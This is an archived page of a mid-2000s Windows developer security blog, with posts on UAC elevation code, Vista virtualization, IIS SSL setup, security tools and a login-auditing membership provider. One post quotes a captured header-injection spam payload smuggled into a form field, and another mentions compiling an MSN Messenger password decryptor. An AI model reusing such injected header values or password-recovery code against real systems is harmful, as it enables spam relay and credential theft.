The interface ID as well as class ID guids come directly from the C++ project (it is always a good idea to "speak" more than one language), but you could obtain those from the type library or registry as well if you don't have the source code of the component handy.

Object creation is handled via LaunchElevatedCOMObject, and the resultant object is cast to the interface from the imported type library. Noteable (and important) is the last line: because the object wasn't created by the runtime, we have to take care of its destruction (the created interface doesn't have a Release() method, so we use Marshal.ReleaseComObject).

That's it - your managed code is now instantiating an elevated COM object that has full reign over the system.

ElevateCOMComponentSample.zip (117.07 KB)

Categories: .NET | Security | UAC | Use the source Luke | Vista
Tuesday, 30 January 2007 10:14:50 (W. Europe Standard Time, UTC+01:00)  #    Comments [0]

 

When you are working with Windows Vista, you know that even the administrative users are stripped ("filtered") of their privileges for normal operations, and that when you have to perform tasks requiring administrative privileges, you are presented with an UAC elevation prompt. The idea of this blog post series is to provide you with working samples on how to work with elevation from inside managed applications (you might also want to read Windows Vista Application Development Requirements for User Account Control Compatibility).

I want to side-step the really easy part - providing a manifest to start the entire application elevated (a good idea if the application makes no sense at all unless it has administrative rights, like regedit.exe). You can find information on those topics in Adding a UAC Manifest to Managed Code and Vista: User Account Control.

Now back to the topic of this post: App A needs to start App B with administrative rights (because App B e.g. needs to write to HKLM or Program Files). Therefore, we somehow must run App B as an administrative user (or with the non-filtered token of the current user). So how do we go about it?

First, some eye candy. You definitely already saw those nice shield icons before:

Those shield icons are stock on Windows Vista and indicate to the user that the action that hides behind the button requires elevation. I didn't create a button control myself - instead, I reused one that is readily available on the Web: Add a UAC Shield to your Winforms buttons in C#.

All I had to do myself was to start the Process ("App B"):

private void startProcess_Click(object sender, EventArgs e)
{
  ProcessStartInfo psi = new ProcessStartInfo();
  psi.FileName = theProcess;
  psi.Verb = "runas";
  Process.Start(psi);
}

The ticket (so to speak) for the elevation prompt is setting the Verb to "runas" in the ProcessStartInfo instance - this will pop up the elevation prompt if necessary when Process.Start is called.

This simplistic approach has a problem though - once App B is started, users can switch back to App A, because it App B isn't "modal" for App A. To solve this problem, I incorporated the approach from Daniel Moth outlined in his post Launch elevated and modal too:

private void launchModal_Click(object sender, EventArgs e)
{
  ProcessStartInfo psi = new ProcessStartInfo();
  psi.FileName = theProcess;
  psi.Verb = "runas";

  psi.ErrorDialog = true;
  psi.ErrorDialogParentHandle = this.Handle;

  try
  {
    Process p = Process.Start(psi);
    p.WaitForExit();
  }
  catch (Exception ex)
  {
    MessageBox.Show(ex.ToString());
  }
}

And that's it - App B is now modal. Once App B quits, control is relinquished to App A (which still doesn't run with administrative rights).

ElevateProcessSample.zip (21.1 KB)

Categories: Security | UAC | Use the source Luke | Vista
Tuesday, 30 January 2007 08:14:31 (W. Europe Standard Time, UTC+01:00)  #    Comments [1]

 



#  Thursday, 25 January 2007

Got a developer question on how Windows Vista security affects your application? Then the MSDN Forum Security for Applications in Windows Vista is the right place to go.

Categories: Community | Security | Vista
Thursday, 25 January 2007 10:38:07 (W. Europe Standard Time, UTC+01:00)  #    Comments [0]

 

I don't recommend turning off UAC (User Account Control) on Windows Vista, but there might be valid reasons to shut it off once in a while for testing purposes (like in a VM). That is where TweakUAC comes in handy:

Categories: Security | UAC | Vista
Thursday, 25 January 2007 10:32:21 (W. Europe Standard Time, UTC+01:00)  #    Comments [0]

 



#  Friday, 22 December 2006

Michael Howard has all the links in this blog entry Online Security Sessions from TechEd IT Forum Available. Topics include: malware cleaning, UAC internals, social engineering, Vista kernel changes, Vista firewall and IPSec enhancements. Which reminds me that the post-conference DVDs should tip up in my mailbox rsn.

Categories: .NET | Security | Training and Conferences | Vista
Friday, 22 December 2006 16:46:01 (W. Europe Standard Time, UTC+01:00)  #    Comments [0]

 



#  Tuesday, 12 December 2006

This is the firewall settings dialog - much the same as we know it from Windows XP already:

However, once you fire up the management console (mmc.exe), you can add snapins for advanced firewall configuration (ok, IPSec is one of my personal favorites and not necessary to configure the firewall per se...):

Once you have done this, you can now configure the firewall like, well, an administrator would expect - rule based:

Categories: Administration | Security | Vista
Tuesday, 12 December 2006 20:46:50 (W. Europe Standard Time, UTC+01:00)  #    Comments [1]

 



#  Wednesday, 29 November 2006

I have been promoting this tool more than once on this blog, so this time just the download link for version 2.1.

Categories: Cool Download | Security
Wednesday, 29 November 2006 09:33:58 (W. Europe Standard Time, UTC+01:00)  #    Comments [0]

 



#  Wednesday, 22 November 2006

I admit it: I am a regular reader of the event log. In doing so, I came across an error message last week that I rarely get to see - invalid Viewstate:

Now, that wouldn't be a problem, usually at least. However, in this special case I went WTF? when I looked at the description more closely, especially at the PersistedState information:

PersistedState: a
Content-Transfer-Encoding: 8bit
Content-Type: text/plain
X-Mailer: EMUmail 4.5
Subject: jam n
bcc: <list of addresse removed by me />
comes from the loin in the middle of the back of the pig. t is a lean meaty 
cut of bacon, with relatively less fat compared to other cuts. iddle bacon
is much like back bacon
 
 
 
daa6c5071189f202ceb370d0e9d38c33
.

Come again - spam in Viewstate? What would be the point of this? After some research together with Alex I came across this article: Interesting Crack Attempt to Relay Spam (a more detailed article is available too: Form Post Hijacking). How did I manage to not take notice of this attack vector any earlier I don't know, but I have to admit that the idea is pretty clever.

Counter-measures in general? Well, either don't allow users input in the headers at all, or vet the form fields for carriage return / line feeds. Note that I did not verify if any of the available mail components for .NET would be actually susceptible to this kind of attack.

Categories: ASP.NET | Security
Wednesday, 22 November 2006 09:47:35 (W. Europe Standard Time, UTC+01:00)  #    Comments [0]

 



#  Tuesday, 21 November 2006

At next year's VSone in Munich (a German developer conference taking place in February), I will be doing three talks:

  • Visual Studio 2005 Team Edition for Database Professionals
  • User Account Control (UAC) in Your Applications
  • Advanced Code Access Security (CAS)

Two security topics, one team-development focused. See you in Munich!

Tuesday, 21 November 2006 16:21:21 (W. Europe Standard Time, UTC+01:00)  #    Comments [0]

 



#  Monday, 20 November 2006

I already talked about the virtualization features of Windows Vista in a previous blog post entitled UAC Redirection 4 Fun & Profit. Today, I want to tackle the file redirection that happens when UAC virtualizes your application and you try to write to a location it monitors - like the Program Files directory:

This command prompt was started with Run as Administrator (the window title hints at that). I was UAC-prompted, and then could go about my business. Not so if I would be running it unelevated:

It tells me that I don't have access. Right, not a big surprise, but why didn't virtualization kick in for cmd.exe? Because it is off by default for the command line. How can I turn it on? Well, easy. Go to Windows Task Manager

Add the Virtualization column

After a bit drag & drop magic I made it the second column and I can see which application is virtualized or not. And sure enough, cmd.exe isn't. Right-clicking allows you to change that:

You will be warned that this will possibly affect the running application, but go ahead. And then try again to write to the Program Files location:

This time I can write to Program Files - wait a second, really? No, it of course went to the virtual store for this user account:

As you can see, it lives next to files from a heck a lot of applications that wanted to write to somewhere (like system32) where they didn't have access to - but virtualization (on by default for applications except those opting out explicitly) took care of the disk operations and redirected them to the virtual store. Note that a well-written application (ie one that doesn't require administrative rights) wouldn't show up here...

Categories: Security | Vista
Monday, 20 November 2006 08:03:43 (W. Europe Standard Time, UTC+01:00)  #    Comments [0]

 



#  Sunday, 12 November 2006

This Q&A item is part of the current MSDN magazine's Security Brief's column by Keith Brown. I am pretty sure that this problem will rear its head sooner or later on every developers machine, that's why I am 'pinning' the link in my blog for my own reference too.

Categories: .NET | IIS | Security | 3.0 | WCF
Sunday, 12 November 2006 16:41:26 (W. Europe Standard Time, UTC+01:00)  #    Comments [0]

 



#  Thursday, 09 November 2006

The Windows Vista Security Guide provides recommendations and tools to further harden Windows Vista. Well, go get it.

Categories: Security | Vista
Thursday, 09 November 2006 08:28:41 (W. Europe Standard Time, UTC+01:00)  #    Comments [0]

 



#  Wednesday, 01 November 2006

The November 2006 issue has lots of good security articles, which are available online too. Check out Security Habits, Threat Modeling (STRIDE approach), Extending SDL or SQL Security to name a few.

Categories: .NET | Security | SQL Server
Wednesday, 01 November 2006 13:56:55 (W. Europe Standard Time, UTC+01:00)  #    Comments [0]

 



#  Monday, 30 October 2006

Last Tuesday, I held the talk "Advanced Code Access Security" at UG Styria in Graz. This talk was originally part of the MSDN Security Briefings held in Austria earlier this year, for which MS Austria had asked MVPs to help create and deliver security content. Advanced CAS seemed an interesting enough developer topic to re-run at user groups, and Mario (the author of this session) has allowed me to publish the slide deck and demos for the general public.

AdvancedCodeAccessSecurity.pdf (4542 KB)

AdvancedCAS.zip (599.6 KB)

Please note that I have published only demos four (setting CAS via setup) and six (using CAS in addin application) - those are the "completed" versions of the demos.

Categories: .NET | 2 Ohhhh | Community | Cool Download | Security | this
Monday, 30 October 2006 09:10:54 (W. Europe Standard Time, UTC+01:00)  #    Comments [0]

 



#  Monday, 21 August 2006

This is a whitepaper published by MS (download here). From the download page:

Gain valuable information about the concepts of social engineering within the IT security workspace. In section one, the guide provides a working definition of social engineering that can be used within a company's security policies and is meaningful to non-IT security staff. The guide describes the aims and objectives of an attacker and shows how social engineering, like hacking, is a threat to all businesses, not just enterprise or government institutions. The guide will also cover:

  • Social engineering and the defense-in-depth layered model
  • Social engineering threats and defense
  • Online, telephone-based, and waste management threats
  • Personal approaches
  • Reverse social engineering
  • Designing and implementing defenses against social engineering threats
  • Developing a security management framework
  • Risk management
  • Social engineering in the organizational security policy
  • Awareness
  • Managing incidents
  • Operational considerations
  • Security policy for social engineering threat checklists
Categories: Security
Monday, 21 August 2006 15:17:11 (W. Europe Daylight Time, UTC+02:00)  #    Comments [0]

 



#  Thursday, 29 June 2006
Categories: .NET | Project Management | Security
Thursday, 29 June 2006 07:47:25 (W. Europe Daylight Time, UTC+02:00)  #    Comments [0]

 



#  Wednesday, 31 May 2006

When you run an application that needs administrative rights (in this specific case via a manifest file), you are prompted with an UAC dialog to allow this operation:

This is the dialog you get for the "default" user, the one you create during setup that is a member of the Administrators group. Contrast that to the dialog a standard user is presented with:

uacpromptforadmin.PNG

Now, I am fine with prompting the user to enter administrative credentials. However, I am not fine with providing the user with the name of the administrative user(s) on that machine. In my opinion, this is giving away security-related information without need.

Update Of course you can always use net localgroup Administrators to get a list of the members of the Administrators group (Markus pinged me on that one). This feature has been available for ages, true. However, I am not convinced that the UAC convenience of providing the administrative accounts on a silver platter is really necessary.

Categories: Security | this | Vista
Wednesday, 31 May 2006 14:46:05 (W. Europe Daylight Time, UTC+02:00)  #    Comments [0]

 



#  Wednesday, 24 May 2006

Michael Howard plugged his latest book The Security Development Lifecycle in his blog back in April (A New Book: The Security Development Lifecycle). It isn't yet available in stores, but I decided to preorder because I'm really looking forward to this book. Why? Because it describes a security process in development that works - the SDL @ Microsoft.

Categories: Books | Security
Wednesday, 24 May 2006 08:40:22 (W. Europe Daylight Time, UTC+02:00)  #    Comments [0]

 



#  Tuesday, 23 May 2006

A /. article pointed me to the blog post Reporting Vulnerabilities is for the Brave. Sounds familiar. Been there, done that. A customer had a Web site, and I told them about a problem. They told their vendor. And the vendor went after me - probably because, like most security-unconscious companies they felt threatened in one way or another.

Therefore I wholeheartedly agree with the instructions outlined, plus: lean back, and enjoy when the bad guys whack that company. Yes, this is controversial, but as long as companies don't "get it" that there are people that want to help them when reporting vulnerabilities, it is definitely better to keep your trap shut.

Aside from the cynical advice in the above paragraph, here is something to consider for your company: establish a policy - and publish it! - that you welcome security reports by security researchers (and Joe Average for that matter). This goes a long way to getting the threats mitigated before they are exploited.

Categories: Newsbites | Security | this
Tuesday, 23 May 2006 10:12:41 (W. Europe Daylight Time, UTC+02:00)  #    Comments [0]

 



#  Sunday, 21 May 2006

The TAM tool is now available as release candidate 1. If you don't know it (already), here is the quick scoop from the download page: Microsoft Threat Analysis & Modeling tool allows non-security subject matter experts to enter already known information including business requirements and application architecture which is then used to produce a feature-rich threat model. Along with automatically identifying threats, the tool can produce valuable security artifacts such as:

  • Data access control matrix
  • Component access control matrix
  • Subject-object matrix
  • Data Flow
  • Call Flow
  • Trust Flow
  • Attack Surface
  • Focused reports

By the way, use this link to search for the video series on threat modeling in the Download Center!

Categories: Cool Download | Security
Sunday, 21 May 2006 12:30:05 (W. Europe Daylight Time, UTC+02:00)  #    Comments [0]

 



#  Wednesday, 17 May 2006

Tracking down the URL for the Webcast Detecting and Debugging Common Application Issues Using the Windows Application Verifier really turned into a scavenger hunt today... if you don't know what AppVerifier is, download it here, and read more here.

Categories: Security | Team System
Wednesday, 17 May 2006 21:07:47 (W. Europe Daylight Time, UTC+02:00)  #    Comments [0]

 



#  Thursday, 11 May 2006

On Tuesday I was presenting a Windows Vista security session, which included UAC (user account control) and respective demos. One part was showing UAC data redirection, and for this blog post I will stick with the registry side of things.

Why this redirection in the first place? Well, old legacy applications do tend to assume that you are running as admin on your box. Thus, those apps simply store "stuff" in the HKLM hive of the registry, instead of HKCU. To allow such misguided apps to run on Vista smoothly, UAC automagically redirects write operations from the actual HKLM location to a VirtualStore branch of the current user's profile.

Let's look at an example of a classic no-no:

try
{
  RegistryKey MyTest = Registry.LocalMachine.OpenSubKey("Software\\Microsoft\\Microsoft SDKs\\.NETFramework\\v2.0", true);
  MyTest.SetValue("InstallationFolder", ContentsText.Text, RegistryValueKind.String);
  MyTest.Close();
  ResultsLabel.Text = "Successfully written to registry!";
}
catch (Exception ex)
{
  ResultsLabel.Text = "Unable to write to registry: " + ex.Message;
}

On XP, being non-admin, you would end up in the catch block. Not so on Vista. With Vista, this will work out ok, and the data will be stored like this:

Nice indeed. Or is it actually nice? Let's look at the code for reading the value again:

try
{
  RegistryKey MyTest = Registry.LocalMachine.OpenSubKey("Software\\Microsoft\\Microsoft SDKs\\.NETFramework\\v2.0", true);
  ContentsText.Text = MyTest.GetValue("InstallationFolder") as string;
  ResultsLabel.Text = "Successfully read from registry!";
}
catch (Exception ex)
{
  ResultsLabel.Text = "Unable to read from registry: " + ex.Message;
}

So what's your guess where the value will come from - the original HKLM location or the redirected HKCU VirtualStore location? Right, the VirtualStore is the winner.

Now, I intentionally picked an existing value in the registry to "overwrite". Imagine somebody writing a "fuzzer" to go over every single value in HKLM and write back gibberish for every value it finds. The original application will now too see this gibberish instead of the original good values.

Time will tell whether virtualizing based on user and not application will create more havoc than do good. Because thanks to UAC malware needs no extra rights to botch up your registry...

Update Yes, sure, you can turn off this virtualization. Check out the blog entry User Account Control Windows Vista Policies.

Categories: Longhorn | Security
Thursday, 11 May 2006 14:42:03 (W. Europe Daylight Time, UTC+02:00)  #    Comments [0]

 



#  Friday, 05 May 2006

Next week, I am doing the first in a series of security on-site briefings for Microsoft Austria. Mario has blogged about our TTT event in two entries Security Technical Briefings - Train-The-Trainer... a looong evening (Part 1) and Security Technical Briefings - Part 2. Thanks to the workshop character, no two briefings will be alike.

Friday, 05 May 2006 08:41:52 (W. Europe Daylight Time, UTC+02:00)  #    Comments [0]

 



#  Thursday, 04 May 2006

The process of threat modeling is built on a simple principle: To build a feasibly secure system, one must understand all the threats in that system. The challenge, however, is in making threat modeling more accessible to non-specialists. Microsoft has developed a process through which minimal input can produce a feature-rich threat model that identifies a wide range of critical information including contextual threats, trust boundaries, fracture points, attack surfaces, and direct and transitive access control. This podcast describes and demonstrates this threat modeling process, outlines its benefits, and shows how threat modeling fits into the Microsoft Security Development Lifecycle.

Download & Listen

Categories: Security
Thursday, 04 May 2006 10:28:20 (W. Europe Daylight Time, UTC+02:00)  #    Comments [0]

 



#  Tuesday, 02 May 2006

Found this on Alex' blog (he posted it in German last week): Microsoft UK has released a document (PDF) titled "The Developer Highway Code" (The drive for safer coding), which covers the following topics:

  • Integrating Security into the Lifecycle
  • Security Objectives
  • Web Application Security Design Guidelines 
  • Threat Modelling
  • Security Architecture and Design
  • Security Code Review
  • Security Deployment Review

The document covers v1 and v2 of the .NET Framework, and it does contain useful checklists. Be sure to grab it!

Categories: .NET | Security
Tuesday, 02 May 2006 15:17:31 (W. Europe Daylight Time, UTC+02:00)  #    Comments [0]

 



#  Wednesday, 12 April 2006

During the MVP Open Day in Munich last week (Friday & Saturday), we had a presentation by Talhah Mir (ACE Team, Threat Modeling blogs) on threat modeling - which (I hope) everyone is familiar by now. During the talk, he pointed us to an interesting resource: A Chronology of Data Breaches from the Privacy Rights Clearinghouse. Quite an interesting list of incidents, which gives you an idea of the ratio of actual hacking vs dishonest insider, as well as other types of security breaches.

Categories: Community | Security
Wednesday, 12 April 2006 10:20:38 (W. Europe Daylight Time, UTC+02:00)  #    Comments [0]

 



#  Wednesday, 05 April 2006

Aside from disabling UAP, I also went back to THE Administrator account. Doing so can get quite messy unless you join your Vista box to a domain, as outlined in the blog entry Trouble signing on as THE Administrator on 5308? Now I have access to applicationHost.config again. Good security does get in the way, but this is just way too onerous.

Categories: Longhorn | Security
Wednesday, 05 April 2006 10:20:04 (W. Europe Daylight Time, UTC+02:00)  #    Comments [0]

 

After 'killing' three Vista installations yesterday, laziness got the better of me. I launched msconfig.exe, went to the Tools tab, and did this:

A reboot later I am a happy (and no longer annoyed) camper. Security obviously went out the window, however, I don't think this installation will live long enough either for this to be an issue.

Categories: Longhorn | Security
Wednesday, 05 April 2006 08:48:51 (W. Europe Daylight Time, UTC+02:00)  #    Comments [0]

 



#  Wednesday, 29 March 2006

If you need to find out just what devices are running Web services in your network (aside from the obvious Web servers, this includes nowadays printers, access points and many more), then you should check out httprint. It doesn't rely on server banners or fall for other obfuscation techniques, so it is quite handy to find out just what software is running on that box.

Categories: Administration | IIS | Security
Wednesday, 29 March 2006 15:14:01 (W. Europe Daylight Time, UTC+02:00)  #    Comments [0]

 



#  Tuesday, 28 March 2006

In case you need it too: Configuring SSL Host Headers shows you how to get up and running with one IP, port and certificate but multiple host headers. All you need is a wildcard certificate (learn more here) and some CLI magic because there is no UI for it. Basically, it boils down to (for example):

adsutil.vbs set w3svc/siteid/SecureBindings ":443:host.wildcarddomain.com"

Categories: Administration | IIS | Security
Tuesday, 28 March 2006 19:33:32 (W. Europe Daylight Time, UTC+02:00)  #    Comments [0]

 

Don't know how this one could slip by me - Windows Server 2003 Service Pack 1 (SP1) shipped a rather important update: you can run SSL in kernel mode (http.sys) instead of user mode. There are restrictions which are detailed here (most B2C SSL sites will do just fine), and the procedure to enable kernel-mode SSL shows how to get up and running in no time. Mostly you are only dealing with the registry key HKLM\System\CurrentControlSet\Services\HTTP\Parameters\EnableKernelSSL.

Categories: Administration | IIS | Security
Tuesday, 28 March 2006 19:24:04 (W. Europe Daylight Time, UTC+02:00)  #    Comments [0]

 



#  Wednesday, 01 March 2006

Six short & modular security training modules have been launched:

  • Canonicalization Lab
  • Cookies Lab
  • Cross Site Scripting Lab
  • Regular Expressions Lab
  • SQL Injection Lab
  • Validation Controls Lab
Categories: Security
Wednesday, 01 March 2006 07:40:45 (W. Europe Standard Time, UTC+01:00)  #    Comments [0]

 



#  Friday, 24 February 2006

Brought to you by MSDN TV: Watch the White Hats and the Black Hats battle for the security of Las Vegas, Nevada. Jessi Knapp and Microsoft Security Guru Joe Stagner narrate as the Hackers try to gain control of The Plaza's online money management system and our Security Team tries to stay one step ahead. Watch

Categories: Security
Friday, 24 February 2006 02:52:05 (W. Europe Standard Time, UTC+01:00)  #    Comments [0]

 



#  Sunday, 19 February 2006

On my flight to Seattle today (or yesterday, depending on the time zone) I started to read Professional ASP.NET 2.0 Security, Membership, and Role Management by Stefan Schackow. The book definitely is a must-have for every ASP.NET developer, even if you decide to read one chapter only: A Matter of Trust (#3). This one will save you loads of time when you have to deploy an application into non-full trust environments. However, the other chapters are worthwhile too, like #2 which details exactly which identity is used when by what part of the engine. Bottomline: highly recommended reading.

Categories: .NET | 2 Ohhhh | ASP.NET | Books | Security
Sunday, 19 February 2006 09:21:00 (W. Europe Standard Time, UTC+01:00)  #    Comments [0]

 



#  Wednesday, 01 February 2006

THE security scanner has been made available in version 4.0. Nmap is a tool you should not miss out on when you are in need of scanning networks and hosts.

Categories: Cool Download | Security
Wednesday, 01 February 2006 08:48:16 (W. Europe Standard Time, UTC+01:00)  #    Comments [0]

 



#  Thursday, 17 November 2005

Wired is running a story by Bruce Schneier: Real Story of the Rogue Rootkit. Spot on.

Categories: Security
Thursday, 17 November 2005 19:07:38 (W. Europe Standard Time, UTC+01:00)  #    Comments [0]

 



#  Wednesday, 05 October 2005

David Litchfield published the paper Data-mining with SQL Injection and Inference (more NISR papers). From the abstract: When drilling for data via SQL injection there are three classes of attack – inband, out-of-band and the relatively unknown inference attack. Inband attacks extract data over the same channel between the client and the web server, for example, results are embedded in a web page via a union select. Out-of-band attacks employ a different communications channel to drill for data by using database mail or HTTP functions for example. Inference attacks stand alone in the fact that no actual data is transferred – rather, a difference in the way an application behaves can allow an attacker to infer the value of the data.

Categories: Security | SQL Server
Wednesday, 05 October 2005 23:36:51 (W. Europe Daylight Time, UTC+02:00)  #    Comments [0]

 



#  Friday, 16 September 2005

The day started out with one of those famous spoof videos - this time about a "variation" of Windows error reporting, dubbed WE-SYP (we share your pain). Error reporting tied to a - let's call it - "multimedia" chair. Fun to watch.

Right after that, Bob Muglia showed off what we can expect from Windows Server in the next couple of year. Windows Server 2003 Compute Cluster Solution was demoed together with Excel Services - impressive. TxF (transactional NTFS) wasn't any less exciting, just like the identity solutions - and, of course, IIS 7.0. We got the bits for the latter today. 

Sessions I attended today:

  • Windows Communications Foundation ("Indigo"): A Deep Dive into Best Practices Using the Windows Communications Foundation
  • ASP.NET: Future Directions for Developing Rich Web Applications with Atlas (Part 2)
  • ASP.NET: A Sneak Peek at Future Directions in Web Development and Designer Tools
  • Windows Vista & "Longhorn" Server: Under the Hood of the Operating System—System Internals and Your Application
  • ASP.NET: Deep Dive into the ObjectDataSource Control

The under the hood session for Longhorn server had one interesting tidbit - they aim to require mandatory signing for kernel mode drivers on x64 platforms - bye bye kernel root kits!

Bradley Millington quite overshot his allocated timeslot for the ObjectDataSource control, but he covered interesting areas: filtering and master details, custom sorting and paging, updates inserts deletes as well as transactions and caching. Seeing realistic examples is a welcome change. A good place for you to start: the Advanced Data Scenarios section of the Quickstarts. (Note: those links point to http://beta.asp.net, and I don't think that Whidbey docs will be up and running there forever, given that "Orcas" starts appearing on the horizon).

Categories: 2 Ohhhh | ASP.NET | IIS | Security | this | Training and Conferences
Friday, 16 September 2005 05:20:36 (W. Europe Daylight Time, UTC+02:00)  #    Comments [0]

 



#  Tuesday, 13 September 2005

Today was preconference day at the PDC. I opted for Keith Brown's talk Attack and Defense: The Art of Secure Coding. Of course it contained a couple of well-known "friends" such as SQL Injection, but there were other interesting tidbits that made it worthwhile.

Speaking of which, including (four) product demos was a good idea, here is the list of products in order of presentation:

Definitely worth checking out, might save a headache or two when using those tools.

Keith also briefly discussed SDL (Security Development Lifecycle) vs Security Engineering Guidelines. You could also cast that as ideal world (ie lots of cash for security available) vs real world. Therefore: go for patterns & practices stuff to make your projects secure.

Categories: .NET | Security | this | Training and Conferences
Tuesday, 13 September 2005 03:20:11 (W. Europe Daylight Time, UTC+02:00)  #    Comments [0]

 



#  Tuesday, 23 August 2005

I admit that I am not the sort of person who likes to go through long and winded installation instructions. However, I am willing to go to great lengths when it comes to security - still with certain limits though. And I hit such a brick wall today: trying to secure Subversion. From the documentation, I knew that the recommended path was SSH, so I set out to find out how to get this up and running on my Windows box.

Owning the black sock in Google fu, I came up with various articles, the most helpful being SVN+SSH+public key authentication on Windows Box as server. Most helpful because after reading the aforementioned recipe plus Subversion / TortoiseSVN SSH HowTo, I decided to scratch my efforts. Why?

For starters, I am not a big fan of Cygwin. That's just personal mischief of a Windows guy, I can swallow my pride when the tools that depend on it provide merit. What's more of a problem for me is installing a service for adding security to another service - especially if I need that new service just for the "security purpose", and not the other bells and whistles it can provide (plus the security issues that might be hidden in those unused parts). Call me paranoid, but I simply like to reduce "moving parts" in my setups, because: What's worse than malicious traffic? Right, encrypted malicious traffic.

Secondly, do you think - honestly - that developers love to jump through hoops to get access to the repository? (I am referring to the client side of things on Windows) Not really. From the top of my head, I fall short of naming a single developer I personally know that would love to follow those steps. But every single one of them would be more than willing to just replace svn:// for svns:// when accessing a repository.

Conclusion: yes, I am whining about the usability of an open source project. As I am participating on one myself, you very well can spare me the "usual" arguments of do-it-yourself-because-the-sourcecode-is-available-anyways. This is a rant. I want to be unreasonable. But it sure would be nice if security was in the box. Especially nowadays.

Categories: Administration | Security | Subversion
Tuesday, 23 August 2005 16:00:57 (W. Europe Daylight Time, UTC+02:00)  #    Comments [0]

 



#  Thursday, 18 August 2005

This is not just a plain announcement of the revamped German MSDN Developer Center - Sicherheit, it also contains some back patting for myself, so be warned.

My part in this relaunch was to go over "Basiswissen: Know How für Einsteiger" (~ Security [1..4]01) and pull together useful content in the security area applicable to developers. The result? A mix of books (some of the very best information still is only available in dead tree rendition), online articles and more. Everything is nicely presented in a box in the middle of the page:

Grundlagen (Foundation), .NET Framework Sicherheit (.NET Fx Security), Web Services (I proposed "Web Services & Distributed Technologies"), ASP.NET and Kryptographie (cryptography, my pet peeve) are the sections that I contributed. Judging from a brief perusal, it seems that mostly only my content is in there. So Michael and Uwe will accept my apologies for me claiming those to be "my" sections.

Categories: .NET | Newsbites | Security | this
Thursday, 18 August 2005 13:16:04 (W. Europe Daylight Time, UTC+02:00)  #    Comments [0]

 

As a long-time subscriber as well as regular reader of the Bugtraq mailing list, I saw Gregory's post on decrypting MSN Messenger passwords. Because that one really piqued my interest, I immediately headed over to infoGreG and grabbed the source code, put it into a VS.NET 2003 C++ project, fixed a couple of compiler switches, and et voila - it works as advertised!

Categories: Security | this | Use the source Luke
Thursday, 18 August 2005 08:06:45 (W. Europe Daylight Time, UTC+02:00)  #    Comments [2]

 



#  Tuesday, 16 August 2005

From the summary of this security practice: This module presents a set of consolidated practices designed to address ASP.NET version 2.0 security issues. The answers and recommendations presented in this module are tight distillations designed to supplement the companion modules and additional guidance. The practices are organized by various categories that represent those areas where mistakes are most often made.

Security Practices: ASP.NET 2.0 Security Practices at a Glance

Categories: 2 Ohhhh | ASP.NET | Security
Tuesday, 16 August 2005 10:01:40 (W. Europe Daylight Time, UTC+02:00)  #    Comments [0]

 



#  Thursday, 11 August 2005
Read about this article on Bruce Schneier's blog. Interesting and fun read, especially early in the morning. Assembler knowledge a plus, but not a requirement.
Categories: Security
Thursday, 11 August 2005 08:33:07 (W. Europe Daylight Time, UTC+02:00)  #    Comments [0]

 



#  Tuesday, 02 August 2005

On 12th of August, the Austrian .NET community is hosting a one-day conference on security, targeted at developers (no surprise here). The topics for NCC 2005 A include:

  • Threat Modeling
  • What's new in .NET 2.0 Security
  • What's new in SQL Server 2005 Security
  • What's new in Windows Vista Security

Quite a nice line-up I'd say. This event is supported by Microsoft Austria, so attending this event is free, except for your time, but I am sure security does warrant a day of your time! Sign up here

Tuesday, 02 August 2005 15:27:45 (W. Europe Daylight Time, UTC+02:00)  #    Comments [0]

 



#  Tuesday, 26 July 2005
The registration for this year's .NET Community Conference in Austria went live today (register here, it's free). The thread of this years rendition is security: threat modeling, .NET 2.0 security features, SQL Server 2005 security and more. Definitely worth your time, if you have time to spare, join us on 12th of August in Vienna!
Tuesday, 26 July 2005 15:37:13 (W. Europe Daylight Time, UTC+02:00)  #    Comments [1]

 



#  Monday, 25 July 2005

On Friday, it was my turn as speaker at the Community Bootcamp 2005 aka CBC05. One of the topics at hand was "The Provider Model", with a focus on Membership providers. Those are the ones most likely being extended / written from scratch, and we did an exercise in that very area: Extend the SqlMembershipProvider to audit successful and failed logins similar to *nix. The solution I present today is a streamlined solution programmed by Alexander Schoeppl, one of the attendees.

Step 1: Create the table

CREATE TABLE [dbo].[myLoginAuditing](
 [username] [varchar](255) NOT NULL,
 [numberofSuccessfulLogins] [int] NOT NULL,
 [numberofFailedLogins] [int] NOT NULL,
 [lastFailedLogin] [datetime] NOT NULL,
 [lastFailedLoginIP] [varchar](15) NOT NULL)

Step 2: Create the stored procedure

create procedure myLogUserVisit(
  @username as Varchar(255),
  @success as int,
  @lastfailedLoginIP as varchar(15))
as
   IF ( EXISTS ( SELECT username
                  FROM   dbo.myLoginAuditing
                  WHERE  username = @username ) )
    BEGIN
    if (@success = 1)
    Begin
      update myLoginAuditing set
numberofSuccessfulLogins = numberofSuccessfulLogins + 1
        where username = @username
    End
    else
    begin
      update myLoginAuditing set
numberofFailedLogins = numberofFailedLogins + 1,
                    lastFailedLogin = GetDate(),
                    lastfailedLoginIP = @lastFailedLoginIP
        where username = @username
    end
  END
  ELSE
  BEGIN
    if (@success = 1)
    Begin
      insert into myLoginAuditing (username, numberofSuccessfulLogins,
numberoffailedlogins, lastfailedlogin, lastfailedloginip)
values (@username, 1, 0, '01.01.1900', '')
    End
    else
    begin
      insert into myLoginAuditing (username, numberofSuccessfulLogins,
numberoffailedlogins, lastfailedlogin, lastfailedloginip)
values (@username, 0, 1, GetDate(), @lastfailedLoginIP)
    end   
  END

Alexander did a smart thing - he looked at the various aspnet* sp's.

Step 3: Write the Membership provider

The class skeleton looks like this:

public class MyMembershipProvider : SqlMembershipProvider
{
public override bool ValidateUser(string username, string password)
{
}

public override void Initialize(string name, System.Collections.Specialized.NameValueCollection config)
{
}

public override MembershipUser GetUser(string username, bool userIsOnline)
{
}
}

Initialize is the easy but essential part - we need the connection string name for later:

private string connectionStringName;

public override void Initialize(string name, System.Collections.Specialized.NameValueCollection config)
{
connectionStringName = config["connectionStringName"];
base.Initialize(name, config);
}

Now we can validate the user - well, the base class does that. We only do the auditing part:

public override bool ValidateUser(string username, string password)
{
HttpContext.Current.Trace.Write("ValidateUser:entry");

bool bSuccess = base.ValidateUser(username, password);

string connectionString = ConfigurationManager.ConnectionStrings[connectionStringName].ConnectionString;

SqlConnection conn = new SqlConnection(connectionString);
SqlCommand cmd = new SqlCommand("exec myLogUserVisit @username, @success, @IP", conn);

cmd.Parameters.AddWithValue("@username", username);
if (bSuccess)
  cmd.Parameters.AddWithValue("@success", 1);
else
  cmd.Parameters.AddWithValue("@success", 0);

cmd.Parameters.AddWithValue("@IP", HttpContext.Current.Request.UserHostAddress);

conn.Open();
cmd.ExecuteNonQuery();
conn.Close();

